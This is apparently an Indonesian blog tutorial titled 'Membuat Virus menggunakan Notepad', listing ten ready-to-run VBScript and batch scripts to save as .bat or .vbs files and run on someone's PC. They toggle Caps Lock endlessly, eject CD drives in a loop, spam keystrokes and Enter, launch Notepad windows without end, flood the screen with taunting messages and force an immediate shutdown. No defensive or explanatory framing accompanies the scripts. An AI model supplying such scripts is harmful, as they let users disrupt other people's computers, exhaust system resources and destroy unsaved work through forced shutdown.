Membuat Virus menggunakan Notepad

Pertama-tama buka text editor anda , kalo gak punya bisa pake Notepad , setelah itu copy paste Scrip di bawah ini kemudian save as type  pilih All Files kemudian simpan file dengan fomat.bat atau .vbs misalnya virus.bat atau virus.vbs

==========================================================================

1. Caps Lock 

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

2. CD Rom gila

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

3. Keyboard jadi rusak

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop

4. Pesan Ngaco

@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC lo kaya’y ngaco….
msg * Udah install ulang aja…..
msg * Biar masalah nya kelar….
msg * Wkwkwkwkwkkkkkkkk….
GOTO BEGIN

5. Notepad

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

6. (bingung beri judul apa)

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “E”
WScript.Sleep 50
WshShell.SendKeys “R”
WScript.Sleep 50
WshShell.SendKeys “O”
WScript.Sleep 50
WshShell.SendKeys “R ”
WScript.Sleep 50
WshShell.SendKeys “R ”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!”

7. Pesan lambat

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Y”
WScript.Sleep 500
WshShell.SendKeys “O ”
WScript.Sleep 500
WshShell.SendKeys “, U”
WScript.Sleep 500
WshShell.SendKeys “D i”
WScript.Sleep 500
WshShell.SendKeys “e ”
WScript.Sleep 500
WshShell.SendKeys “HACK”
WScript.Sleep 500
WshShell.SendKeys “B ”
WScript.Sleep 500
WshShell.SendKeys “u ”
WScript.Sleep 500
WshShell.SendKeys “G ”
WScript.Sleep 500
WshShell.SendKeys “!@#$%^&*()_+_)(*&^%$#@#$%^&*()”
WScript.Sleep 500
WshShell.SendKeys ” M”
WScript.Sleep 500
WshShell.SendKeys “K”
WScript.Sleep 500
WshShell.SendKeys “S !!! ”

8. Shutdown
@ECHO off
msg * -=WARNING=-
shutdown -s -c “Error !!!”

9. tombol truss

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

10. (perhatian virus ini jangan skali2 d coba)

@echo off
msg * YouDie Tralalala Virus Menyebar !!! @#$%^&*()
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0

Leave a comment